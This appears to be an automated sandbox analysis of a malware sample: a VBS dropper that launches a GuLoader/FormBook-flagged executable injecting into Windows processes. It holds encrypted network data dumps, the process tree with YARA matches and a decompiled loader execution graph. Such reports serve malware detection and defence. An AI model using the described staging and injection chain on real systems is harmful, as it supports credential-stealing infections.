                              2024-09-25 15:20:28 UTC964INData Raw: d0 1d 47 3d c7 f3 82 74 12 08 2e 4d 6e 9c d1 49 3f 9a 45 f0 7b 86 01 72 78 22 2c 48 eb aa f6 8f b6 19 76 e0 9e 11 9e 07 e4 c3 30 42 ec d6 88 dc e5 84 87 fe a1 c1 61 3a 13 01 a5 72 e5 d1 0a 5b f7 fa 00 5b 71 cc 92 62 f9 ed a6 58 d8 85 8f d4 3b 17 71 93 16 e7 7a 97 ee 51 91 24 c9 9a 63 82 b4 3f e4 f8 50 89 cd 14 e2 63 b6 05 d9 12 b0 04 7b bb 6f 56 d9 a0 57 f9 89 0d 55 06 df 69 80 b5 11 b3 bd a3 51 22 d7 16 a5 a4 86 20 1a ff 85 0b a3 3f dc 46 79 59 77 66 bf e5 f5 56 78 eb 05 02 4b 82 6b 18 c0 52 f8 df b6 45 da 34 5b 74 d4 1e ea 3d ba d8 bc f1 76 72 2d 4b 89 80 2d 16 8c 7e 2a 59 f9 43 16 f7 11 a5 bd f4 c9 59 47 5e e8 e2 25 8c a4 34 68 51 da b0 b5 df 06 dc dc 98 89 a6 5a f6 f5 3f 38 30 3d e3 0f ae 9e ff 15 24 2c 7a d4 b3 01 50 e3 20 4e 5d 0a 7a 79 40 dd 75 24
                              Data Ascii: G=t.MnI?E{rx",Hv0Ba:r[[qbX;qzQ$c?Pc{oVWUiQ" ?FyYwfVxKkRE4[t=vr-K-~*YCYG^%4hQZ?80=$,zP N]zy@u$
                              2024-09-25 15:20:28 UTC14994INData Raw: 69 d6 cc b1 77 33 c9 e9 53 d2 7d 0b 46 27 b7 0c 0c 98 63 71 4d 5d e4 f3 35 29 96 50 ea 72 1f 0e ce fc f1 cf f2 82 5c 19 cf 1f ac d6 e8 d3 10 29 54 99 db 15 7c 70 d3 61 e8 e0 17 b2 70 ca 51 d6 58 4a a0 49 bd 2b 1a db 96 04 3f b6 af ff ba 6b 11 20 64 98 39 ee cd d1 39 06 d2 9f cf 97 d7 ab 00 f4 9c da 85 e5 4d 33 97 41 19 c0 ec a6 12 d5 c7 5d 67 a4 1f c4 16 84 65 bb aa ec ce 20 a2 f9 cd 0a 84 7f 98 d2 33 da 27 57 04 42 c8 13 57 7f 13 8a ca b6 23 2e df 08 91 ed ee 62 43 07 7d 68 aa 51 27 3d 96 40 cd 34 21 4f 23 b8 3d 8d 83 58 f4 f5 da 94 e1 bf 8c fe 5c 6b a4 2c b9 a3 cc 0f c0 36 be 2b 36 42 5b 36 10 56 c3 4e 0f 00 92 29 11 fe eb a7 42 e4 97 66 ac 08 2a fb bb f2 38 b8 9d 90 43 e8 d3 b7 12 a6 09 46 d7 18 bf 23 92 79 db 07 33 d3 7f 62 b0 b3 43 8e 5e 3e 7b be fb
                              Data Ascii: iw3S}F'cqM]5)Pr\)T|papQXJI+?k d99M3A]ge 3'WBW#.bC}hQ'=@4!O#=X\k,6+6B[6VN)Bf*8CF#y3bC^>{
                              2024-09-25 15:20:28 UTC16384INData Raw: 98 07 be f1 ac 4d ca 88 3b 29 86 a9 39 8c 45 7a ac c2 6f 4e e1 71 1f 2a 01 33 67 32 e8 80 94 10 d5 dd 1f ea 20 00 a1 b6 57 24 e1 e4 ad 60 bc e3 03 40 d6 bf 97 7a 18 94 1d f2 6f 5f c5 bb bb 3d bd 18 ab 5c 98 8f 2f 2f ef fa 9f fe ff b6 53 9e a9 40 d0 76 f2 4e be 8c 50 f0 45 b8 05 a5 61 2c 11 f7 89 53 de 59 ad fe 0e 58 c9 a0 61 15 cf 89 d5 30 c4 94 b8 94 fa a1 08 7e e5 9a 3f 6b 84 66 2e a4 41 67 44 34 ca 40 63 13 8b f7 a7 fa f1 84 00 c9 fd 03 5f 16 56 98 b7 13 7f 11 21 ee cb 63 08 c7 a4 a5 db 7c 20 eb 62 db b8 01 4b bd 1a 0d 7a ea 92 a7 d2 07 ad e1 c1 b9 cd 65 06 73 69 d9 e0 37 06 d1 6f 72 98 24 2b 9e 16 81 31 d7 46 8a f3 69 ac 34 2b f6 75 6c 39 44 54 10 59 70 0c 5e 3b 75 81 1a 8e 9e a3 37 30 be 94 f5 5e 57 7a 25 fe ce 13 3a 4f bd 1c b1 fc 22 e7 e7 f1 55 83
                              Data Ascii: M;)9EzoNq*3g2 W$`@zo_=\//S@vNPEa,SYXa0~?kf.AgD4@c_V!c| bKzesi7or$+1Fi4+ul9DTYp^;u70^Wz%:O"U
                              2024-09-25 15:20:28 UTC16384INData Raw: 3f 7d 41 f5 95 0b aa 3f 10 19 a2 9e 7e 6f 69 cf 71 e1 b7 0e 22 56 d8 1c 5d 8d 87 11 ed f1 d3 9f ea 91 46 6c d5 06 9d 9d 2b a2 61 e9 c4 2e a6 01 0d 6c 07 7c 7b 73 ad 7b ec 8b af e2 8e 49 d7 d9 10 05 5e b7 0f 16 03 11 01 ef 0e 28 ae d7 69 b2 3d 71 36 42 6b a8 cd 13 44 78 6e d8 e9 56 cc b7 7d b1 6a 3f 2d 39 48 49 5f f7 4f e9 27 37 9b 8b dc 39 a3 71 dc 2e 52 d2 c5 dd 9e 37 a3 2f d7 27 57 ce 77 34 a2 94 d0 41 5a 30 71 99 8e e7 83 15 79 9f 7d 8c 1e 46 e1 45 b2 d1 ef 99 12 d5 e7 54 a3 c6 3c 33 31 a6 96 97 0b 81 86 3e 46 3b e1 b9 fb 01 da 37 9e 57 24 09 81 a6 aa cb 06 33 ce 84 f2 d5 bd b4 a2 bd 34 17 4f 81 aa 0e a0 2c cd a0 36 29 78 57 08 4e 2f b9 f4 88 e7 58 e7 12 52 d8 4a 08 26 b4 2a 57 e1 74 99 76 98 c2 3f 5a bf 16 19 1e 89 28 80 45 bd 7d f3 af 0d 72 f1 a1 03
                              Data Ascii: ?}A?~oiq"V]Fl+a.l|{s{I^(i=q6BkDxnV}j?-9HI_O'79q.R7/'Ww4AZ0qy}FET<31>F;7W$34O,6)xWN/XRJ&*Wtv?Z(E}r
                              2024-09-25 15:20:28 UTC16384INData Raw: dc a5 0b 39 17 26 9d 1a 12 a8 db 2b e0 5f db 90 de 0f 30 13 6f 54 56 3d 0b 70 cc d9 11 47 d9 73 71 70 48 66 a9 f1 8f 0d 20 11 e5 52 44 a6 a4 db 7c ee e5 4a b9 53 14 42 32 7f d1 46 43 a6 93 bf 28 91 ff 8a 96 52 ee a4 a3 5d 45 00 59 41 18 d2 9a 34 50 6e 89 7e a9 0c 90 c6 b7 5b d0 34 49 26 60 52 82 5e d7 c7 10 19 4b c9 49 c3 21 76 6e 3f 76 1b 37 e6 3c 9d 9b 68 03 d0 81 04 56 b0 a9 1e aa 4b 2b 8b ac 1b 16 54 ef e9 cf cd 34 1f 12 2a ca 77 39 dc 4a fb ff 75 dd 22 42 da 84 1b 32 e6 7c a6 e9 c1 47 8e e9 6b 64 46 eb 51 c7 35 41 18 91 4e 16 ea 26 2c 39 b5 af 2b b9 c0 18 4f a7 b8 5d 6c ca a2 35 84 8e 98 9a 06 cb 10 98 40 a2 e0 21 cd d2 85 2f 26 56 e7 9d d9 1e 9c 42 e9 dd 57 22 b8 a9 66 1d 96 5c 38 51 5a 92 5a 02 c8 8f 38 e1 ef f8 08 c6 a8 3d 8b f2 d1 6e 65 d0 85 03
                              Data Ascii: 9&+_0oTV=pGsqpHf RD|JSB2FC(R]EYA4Pn~[4I&`R^KI!vn?v7<hVK+T4*w9Ju"B2|GkdFQ5AN&,9+O]l5@!/&VBW"f\8QZZ8=ne
                              2024-09-25 15:20:28 UTC16384INData Raw: 88 5b cd d6 a9 13 05 33 5c 0f ba 92 a3 7a 56 7b 7b 55 fd f5 c3 ae a9 8e 15 46 53 90 fc c5 f2 1c 05 2f 54 28 e6 0b fc 68 b6 b8 ef 49 56 ea 1b 2d 1f 88 d7 51 d6 39 a3 15 d5 9d 84 e0 de 1e 31 fc e0 1a cd 20 1a 38 57 bb c2 40 ea 80 98 18 92 ec 8d 89 19 38 07 4c 4d b8 fa b8 9c 01 bb f8 07 f4 d9 43 85 4c 3d 6f ef 22 5a 1d e2 f9 ab d7 fd 48 bb de 4d b3 d1 03 ea 10 b0 31 f4 dd 44 a2 da 82 13 6f 21 ec f4 63 38 1a a0 11 78 9f a4 e0 8a 92 41 c6 74 0b fd e2 e7 6d f4 9c 1c 4b 50 29 8f 37 c1 51 98 2f 31 01 53 6e 1e 3e c8 00 d1 e8 8e c7 fb e7 8b e5 1f 55 1b dc 38 fa 54 27 13 55 f6 19 fe d6 d1 3e 6f cd fc 38 37 52 99 f1 43 70 10 76 55 53 84 d3 18 c4 85 95 e5 9f 6b 0a a1 91 67 27 f8 3e 71 81 3f ec b9 2e f0 a3 20 64 ff 55 30 ad 6c 19 84 b6 27 a7 71 29 67 87 cb 3c d1 1b ef
                              Data Ascii: [3\zV{{UFS/T(hIV-Q91 8W@8LMCL=o"ZHM1Do!c8xAtmKP)7Q/1Sn>U8T'U>o87RCpvUSkg'>q?. dU0l'q)g<
                              2024-09-25 15:20:28 UTC16384INData Raw: 55 04 14 ec e2 3b 10 19 cc 51 2f 50 a1 db 44 bb f0 66 b0 4a 2e 24 d4 ac 81 25 c0 a7 e7 e1 05 05 56 91 c5 67 64 7a 57 db fa d4 ac 89 42 e0 f7 31 26 38 81 ad 8d 99 67 de d2 6e ed 5f 80 6b 1e 76 2b 83 fb e3 9b 3a f3 c6 8d a1 cb db cb bb 49 01 be a7 5f 35 62 b7 19 e3 54 83 26 36 83 b8 1a 41 19 a0 41 00 57 6a ab 70 1c 1f 08 5c 26 c7 18 62 c8 3d 81 e4 56 8d 42 77 91 61 b0 c0 ce bb 21 1a 87 91 e0 75 f0 bb 8f 65 81 ee 54 16 be bc 5f d9 6c d2 6b 43 ca 84 6c 84 54 50 8a 42 eb e0 92 17 38 18 31 02 95 5d 09 f8 25 18 6e e8 4d 87 20 68 a5 52 6f f7 d5 d5 72 0d 83 50 f8 0d 0d 79 e4 de 3e f1 db 24 9e 3a 1c df 89 b4 96 89 9a f5 93 8f 23 0a c7 f8 2e 63 06 b0 c8 d8 27 f9 85 e0 e5 4e 52 9a 29 01 df 98 21 00 de b8 b1 95 25 8f 70 fd 2e b7 ed c5 06 60 11 93 dc cf 76 91 42 89 b3
                              Data Ascii: U;Q/PDfJ.$%VgdzWB1&8gn_kv+:I_5bT&6AAWjp\&b=VBwa!ueT_lkClTPB81]%nM hRorPy>$:#.c'NR)!%p.`vB
                              2024-09-25 15:20:28 UTC16384INData Raw: 56 86 2b a9 88 90 96 0c 17 9b f8 dc 03 e1 e3 87 44 17 38 5c 45 71 23 18 66 4e 15 1e 79 3b 0a 87 5f 0e fe 46 ed 11 35 46 f0 7f b2 2e fa ac a1 41 03 d7 64 36 3c f3 6b a3 70 13 b6 7f 3f dd 5e fe 54 de c2 4c 2f cc 26 47 02 85 0b 17 a8 a0 c2 32 31 04 9c 60 1c fd b3 df 56 16 cf 69 d5 53 d1 38 62 b5 d7 e8 a4 a1 15 d3 61 ce cd 45 97 3b 46 e2 64 30 5b 7c f4 3d 9c 7f 3c 43 80 f4 fa ff 2b 1b 53 bd 2f d5 69 fa c3 98 98 db da d3 68 08 db 7a 17 64 cd 94 4a 31 31 48 91 ee 52 97 4f 93 52 40 56 fe 7e de 9a 61 85 69 eb c2 a8 94 f5 d9 5e e3 40 fe 45 45 84 0a 13 b6 db 26 26 06 75 e2 f2 c7 f3 4d 5c 51 fb a7 23 27 b4 a7 11 d4 1f fd f6 73 dc 73 0d 6c af a2 06 4f 28 9a 65 77 73 90 48 34 d0 bd ab be d2 e9 a7 84 8c e2 b3 73 6b b8 c5 b5 b1 b3 1d 54 28 b2 7a a3 fb d3 6c ef 14 ae 93
                              Data Ascii: V+D8\Eq#fNy;_F5F.Ad6<kp?^TL/&G21`ViS8baE;Fd0[|=<C+S/ihzdJ11HROR@V~ai^@EE&&uM\Q#'sslO(ewsH4skT(zl
                              2024-09-25 15:20:28 UTC16384INData Raw: b2 63 23 dc c4 73 b9 c0 9f d6 9e 87 0b 96 80 b0 07 5c 86 2f 80 00 ff bc 86 3e 1c 38 98 09 11 c5 30 74 2c f7 7a 1c 7e 09 07 b3 d6 c9 8f 08 f6 37 62 8b 7b b4 13 58 82 38 02 4c 80 b1 e9 94 82 da 1b 59 9a 62 d7 af 60 71 41 82 e9 29 7a c8 bf cd 00 a9 4b c6 00 e4 4d 2c 86 98 78 70 f2 7b 8a 27 a1 86 90 f8 b5 dc e1 0e 8d 3a 88 03 9f 86 8e 75 1a 30 10 49 c0 1c 70 6c 9c 6e b0 e0 e9 1c 31 19 15 6c 96 c1 e0 f8 7c 71 85 79 87 85 ed 17 e8 7a 42 36 04 08 8e 32 65 fb 81 81 9c ac b5 3d 02 96 6f 0e 36 cf fe b9 9e 35 9a 0f 81 87 25 8e 85 69 78 dd 24 2f 2c 79 af 81 12 0f 55 d0 97 1b 95 67 00 c5 de 12 8e 3e 18 89 10 5e 6a 32 38 cc 3d ba eb d3 19 f5 ea 38 66 1e ac dc 2f e0 87 34 07 81 b2 0c e3 2a b3 ff 71 bd 77 81 ba 7c 46 19 d3 26 e7 e6 86 5d 88 c8 c1 64 a1 41 42 9f 79 d6 e4
                              Data Ascii: c#s\/>80t,z~7b{X8LYb`qA)zKM,xp{':u0Ipln1l|qyzB62e=o65%ix$/,yUg>^j28=8f/4*qw|F&]dABy
                              2024-09-25 15:20:28 UTC426INData Raw: 73 ef 9b 4d cf d6 9f cb 6e 92 45 3e cd b2 56 13 79 e5 45 63 6a 3d 5d 99 0e 08 6a f5 bd 50 a1 ec 87 8f 78 9f 92 eb 83 c8 96 d3 94 39 8a 11 38 db 47 b2 5b 30 f3 5f 23 52 2c cc ec 2b 75 5d 06 90 d7 0a 5e df b8 27 0c be c6 a3 ca dd 42 48 f1 11 42 99 86 b2 9b 72 c6 9b 72 2e 5a 71 e4 e4 7a 57 ab d2 fb 6f 8a 0d 26 6b e2 0b 18 b6 8d df d1 ee e2 4c 0e a4 09 6c 96 31 c3 53 08 8b 7c 8c d8 44 d0 ec cb 29 26 ce fb f2 1e e2 1b 6c de 04 47 e9 d3 3c c6 a0 bd 90 e4 46 f1 7b e5 2e ce 5a 30 77 37 8b 65 16 77 71 04 c8 b7 aa f0 35 72 dc 72 4b 65 82 a2 ce 68 18 56 30 71 df 9b fd ae db 9f 35 a9 c9 13 d2 03 38 f7 6a 4c 23 a3 62 6e 9d b2 4b 58 a4 5d 30 00 47 ae df b5 13 99 99 dc 4e f2 29 03 d5 44 b2 b4 d8 01 f0 88 3f 32 16 02 f0 c4 6d 85 2e e3 6d 3d 22 ae 93 08 cb 29 58 cb ef 99
                              Data Ascii: sMnE>VyEcj=]jPx98G[0_#R,+u]^'BHBrr.ZqzWo&kLl1S|D)&lG<F{.Z0w7ewq5rrKehV0q58jL#bnKX]0GN)D?2m.m=")X


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:11:19:57
                              Start date:25/09/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs"
                              Imagebase:0x7ff6cc890000
                              File size:170'496 bytes
                              MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:11:20:04
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
                              Imagebase:0x400000
                              File size:830'512 bytes
                              MD5 hash:C9B895E1253AA2B7147BE9B1E43F2DBD
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.19989077508.00000000032B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 8%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:3
                              Start time:11:20:22
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
                              Imagebase:0x400000
                              File size:830'512 bytes
                              MD5 hash:C9B895E1253AA2B7147BE9B1E43F2DBD
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.20209174867.0000000001876000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:4
                              Start time:11:20:42
                              Start date:25/09/2024
                              Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                              Imagebase:0x140000000
                              File size:16'696'840 bytes
                              MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              General

                              Target ID:5
                              Start time:11:20:42
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\cmdkey.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                              Imagebase:0xc00000
                              File size:17'408 bytes
                              MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:6
                              Start time:11:23:17
                              Start date:25/09/2024
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Explorer.EXE
                              Imagebase:0x7ff7becb0000
                              File size:4'849'904 bytes
                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:18.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:18.8%
                                Total number of Nodes:1562
                                Total number of Limit Nodes:49
                                execution_graph 4795 401c41 4796 403002 17 API calls 4795->4796 4797 401c4a 4796->4797 4798 403002 17 API calls 4797->4798 4800 401c53 4798->4800 4802 4065fa wsprintfW 4800->4802 4801 401cdb 4802->4801 4803 4024c2 4804 40303e 17 API calls 4803->4804 4805 4024c8 4804->4805 4806 40303e 17 API calls 4805->4806 4807 4024d1 4806->4807 4808 40303e 17 API calls 4807->4808 4809 4024da 4808->4809 4810 4065aa 2 API calls 4809->4810 4811 4024e2 4810->4811 4812 4024f3 lstrlenW lstrlenW 4811->4812 4813 405d15 24 API calls 4811->4813 4816 402ea1 4811->4816 4814 405d15 24 API calls 4812->4814 4813->4811 4815 40253a SHFileOperationW 4814->4815 4815->4811 4815->4816 4817 402b42 4818 402b48 4817->4818 4819 402b50 FindNextFileW 4818->4819 4820 4018be 4818->4820 4819->4820 4821 6fc31cc7 4822 6fc31cee 4821->4822 4823 6fc31d4e 4822->4823 4824 6fc31d2f GlobalFree 4822->4824 4825 6fc315eb 2 API calls 4823->4825 4824->4823 4826 6fc31de5 GlobalFree GlobalFree 4825->4826 4827 6fc310c7 4829 6fc310f8 4827->4829 4828 6fc312be GlobalFree 4829->4828 4830 6fc311d7 GlobalAlloc 4829->4830 4831 6fc31258 GlobalFree 4829->4831 4832 6fc31548 3 API calls 4829->4832 4833 6fc312ba 4829->4833 4834 6fc31296 GlobalFree 4829->4834 4835 6fc315eb 2 API calls 4829->4835 4837 6fc31165 GlobalAlloc 4829->4837 4838 6fc31638 lstrcpyW 4829->4838 4830->4829 4831->4829 4832->4829 4833->4828 4834->4829 4836 6fc311ca GlobalFree 4835->4836 4836->4829 4837->4829 4839 6fc311ab GlobalFree 4838->4839 4839->4829 4840 6fc312c6 4843 6fc3101b 4840->4843 4850 6fc3156c 4843->4850 4845 6fc31020 4846 6fc31032 4845->4846 4847 6fc31024 GlobalAlloc 4845->4847 4848 6fc315c5 3 API calls 4846->4848 4847->4846 4849 6fc31038 4848->4849 4852 6fc31572 4850->4852 4851 6fc31578 4851->4845 4852->4851 4853 6fc31584 GlobalFree 4852->4853 4853->4845 4854 404ec7 4855 404ed7 4854->4855 4856 404efd 4854->4856 4861 4054f5 4855->4861 4864 405736 4856->4864 4859 404ee4 SetDlgItemTextW 4859->4856 4862 405e95 17 API calls 4861->4862 4863 405500 SetDlgItemTextW 4862->4863 4863->4859 4865 404f09 4864->4865 4866 40574e GetWindowLongW 4864->4866 4866->4865 4867 405763 4866->4867 4867->4865 4868 405797 4867->4868 4869 40578b GetSysColor 4867->4869 4870 4057a5 SetBkMode 4868->4870 4871 40579b SetTextColor 4868->4871 4869->4868 4872 4057cd 4870->4872 4873 4057be GetSysColor 4870->4873 4871->4870 4874 4057d1 SetBkColor 4872->4874 4875 4057de 4872->4875 4873->4872 4874->4875 4875->4865 4876 4057f7 CreateBrushIndirect 4875->4876 4877 4057ee DeleteObject 4875->4877 4876->4865 4877->4876 3863 402048 3871 403002 3863->3871 3865 40204e 3866 403002 17 API calls 3865->3866 3867 402057 3866->3867 3868 402061 ShowWindow 3867->3868 3869 40206c EnableWindow 3867->3869 3870 402ea1 3868->3870 3869->3870 3872 405e95 17 API calls 3871->3872 3873 403016 3872->3873 3873->3865 3909 6fc31a4a 3910 6fc31aa1 3909->3910 3911 6fc31a5a VirtualProtect 3909->3911 3911->3910 4878 401ecc 4879 403002 17 API calls 4878->4879 4880 401eda SetWindowLongW 4879->4880 4881 402ea1 4880->4881 4882 40234f 4883 40303e 17 API calls 4882->4883 4884 402356 4883->4884 4885 40303e 17 API calls 4884->4885 4886 402361 4885->4886 4887 40303e 17 API calls 4886->4887 4888 40236e 4887->4888 4889 40303e 17 API calls 4888->4889 4890 402379 4889->4890 4891 40303e 17 API calls 4890->4891 4893 402384 4891->4893 4892 4023c4 CoCreateInstance 4897 4023e8 4892->4897 4893->4892 4894 40303e 17 API calls 4893->4894 4894->4892 4895 405d15 24 API calls 4896 4024ba 4895->4896 4897->4895 4898 402dd1 4899 402df2 4898->4899 4900 402dd9 4898->4900 4901 4068c1 5 API calls 4899->4901 4903 403002 17 API calls 4900->4903 4904 402e72 4900->4904 4902 402e2a 4901->4902 4905 40303e 17 API calls 4902->4905 4906 402de9 4903->4906 4907 402e33 4905->4907 4908 403002 17 API calls 4906->4908 4907->4904 4909 402e37 IIDFromString 4907->4909 4908->4899 4909->4904 4910 402e47 4909->4910 4910->4904 4913 406af5 lstrcpynW 4910->4913 4912 402e66 CoTaskMemFree 4912->4904 4913->4912 3935 402656 3936 40303e 17 API calls 3935->3936 3937 40266d 3936->3937 3938 40303e 17 API calls 3937->3938 3939 402678 3938->3939 3954 406280 3939->3954 3942 402ea5 3943 4026d1 3945 4026e7 3943->3945 3946 4026d8 3943->3946 3944 4026bb 3947 40303e 17 API calls 3944->3947 3949 402700 RegSetValueExW 3945->3949 3958 403148 3945->3958 3948 403002 17 API calls 3946->3948 3950 4026c2 lstrlenW 3947->3950 3951 4026df 3948->3951 3953 40271c RegCloseKey 3949->3953 3950->3949 3951->3949 3953->3942 3955 40628f 3954->3955 3956 402697 3955->3956 3957 406298 RegCreateKeyExW 3955->3957 3956->3942 3956->3943 3956->3944 3957->3956 3959 403190 3958->3959 3960 403183 3958->3960 3979 406923 ReadFile 3959->3979 3995 403131 SetFilePointer 3960->3995 3964 4032e4 3964->3951 3965 4032f6 3967 40333d 3965->3967 3971 4032fa 3965->3971 3966 4031b6 GetTickCount 3977 4031ca 3966->3977 3968 40311b ReadFile 3967->3968 3968->3964 3969 40311b ReadFile 3969->3971 3971->3964 3971->3969 3972 4069e6 WriteFile 3971->3972 3972->3971 3974 40323a GetTickCount 3974->3977 3975 40326b MulDiv wsprintfW 3996 405d15 3975->3996 3977->3964 3977->3974 3977->3975 3981 40311b 3977->3981 3984 406e83 3977->3984 3993 4069e6 WriteFile 3977->3993 3980 4031a2 3979->3980 3980->3964 3980->3965 3980->3966 3982 406923 ReadFile 3981->3982 3983 40312e 3982->3983 3983->3977 3985 406eae 3984->3985 3986 406ea6 3984->3986 3985->3986 3987 406ff0 3985->3987 3988 406fc5 GlobalFree 3985->3988 3989 406fcf GlobalAlloc 3985->3989 3986->3977 3987->3986 3991 407055 GlobalFree 3987->3991 3992 40705c GlobalAlloc 3987->3992 3988->3989 3989->3986 3990 406fe9 3989->3990 3990->3987 3991->3992 3992->3986 3994 406a07 3993->3994 3994->3977 3995->3959 3997 405d27 3996->3997 4003 405ddd 3996->4003 3998 405d46 lstrlenW 3997->3998 4001 405e95 17 API calls 3997->4001 3999 405d58 lstrlenW 3998->3999 4000 405d7b 3998->4000 4002 405d6d lstrcatW 3999->4002 3999->4003 4004 405d92 4000->4004 4005 405d85 SetWindowTextW 4000->4005 4001->3998 4002->4000 4003->3977 4004->4003 4006 405d97 SendMessageW SendMessageW SendMessageW 4004->4006 4005->4004 4006->4003 4007 4036d7 SetErrorMode GetVersionExW 4008 403722 GetVersionExW 4007->4008 4010 403759 4007->4010 4009 403744 4008->4009 4009->4010 4011 4037c0 4010->4011 4012 4068c1 5 API calls 4010->4012 4097 406179 GetSystemDirectoryW 4011->4097 4012->4011 4014 4037d6 lstrlenA 4014->4011 4015 4037e4 4014->4015 4100 4068c1 GetModuleHandleA 4015->4100 4018 4068c1 5 API calls 4019 4037f2 4018->4019 4020 4068c1 5 API calls 4019->4020 4021 4037fe #17 OleInitialize SHGetFileInfoW 4020->4021 4106 406af5 lstrcpynW 4021->4106 4024 40384c GetCommandLineW 4107 406af5 lstrcpynW 4024->4107 4026 40385d 4027 4065d1 CharNextW 4026->4027 4028 403897 CharNextW 4027->4028 4029 403985 GetTempPathW 4028->4029 4038 4038b0 4028->4038 4108 403c80 4029->4108 4031 40399d 4032 4039a1 GetWindowsDirectoryW lstrcatW 4031->4032 4033 4039f7 DeleteFileW 4031->4033 4035 403c80 12 API calls 4032->4035 4118 4033c8 GetTickCount GetModuleFileNameW 4033->4118 4039 4039bd 4035->4039 4036 4065d1 CharNextW 4036->4038 4037 403a0a 4040 403a8d 4037->4040 4046 4065d1 CharNextW 4037->4046 4082 403a7f 4037->4082 4038->4029 4038->4036 4043 403971 4038->4043 4039->4033 4041 4039c1 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4039->4041 4242 4036ad 4040->4242 4042 403c80 12 API calls 4041->4042 4044 4039ef 4042->4044 4204 406af5 lstrcpynW 4043->4204 4044->4033 4044->4040 4058 403a29 4046->4058 4050 403bd4 4249 406a83 4050->4249 4051 403be7 4053 403bf0 GetCurrentProcess OpenProcessToken 4051->4053 4054 403bdf ExitProcess 4051->4054 4056 403c08 LookupPrivilegeValueW AdjustTokenPrivileges 4053->4056 4057 403c3c 4053->4057 4056->4057 4061 4068c1 5 API calls 4057->4061 4059 403a53 4058->4059 4060 403a94 4058->4060 4205 406613 4059->4205 4222 4064d7 4060->4222 4065 403c43 4061->4065 4067 403c58 ExitWindowsEx 4065->4067 4071 403c65 4065->4071 4067->4054 4067->4071 4068 403abd lstrcatW lstrcmpiW 4068->4040 4072 403ae4 4068->4072 4069 403aae lstrcatW 4069->4068 4253 401533 4071->4253 4075 403af4 4072->4075 4076 403aed 4072->4076 4073 403a74 4221 406af5 lstrcpynW 4073->4221 4230 405df9 CreateDirectoryW 4075->4230 4225 405e19 CreateDirectoryW 4076->4225 4081 403af9 SetCurrentDirectoryW 4083 403b1c 4081->4083 4084 403b0d 4081->4084 4146 405a19 4082->4146 4234 406af5 lstrcpynW 4083->4234 4233 406af5 lstrcpynW 4084->4233 4087 405e95 17 API calls 4088 403b4c DeleteFileW 4087->4088 4089 403b57 CopyFileW 4088->4089 4094 403b2a 4088->4094 4089->4094 4090 403bb0 4091 406218 35 API calls 4090->4091 4091->4040 4093 405e95 17 API calls 4093->4094 4094->4087 4094->4090 4094->4093 4096 403b9b CloseHandle 4094->4096 4235 406218 MoveFileExW 4094->4235 4239 4066b1 CreateProcessW 4094->4239 4096->4094 4098 40619b wsprintfW LoadLibraryExW 4097->4098 4098->4014 4101 4068e3 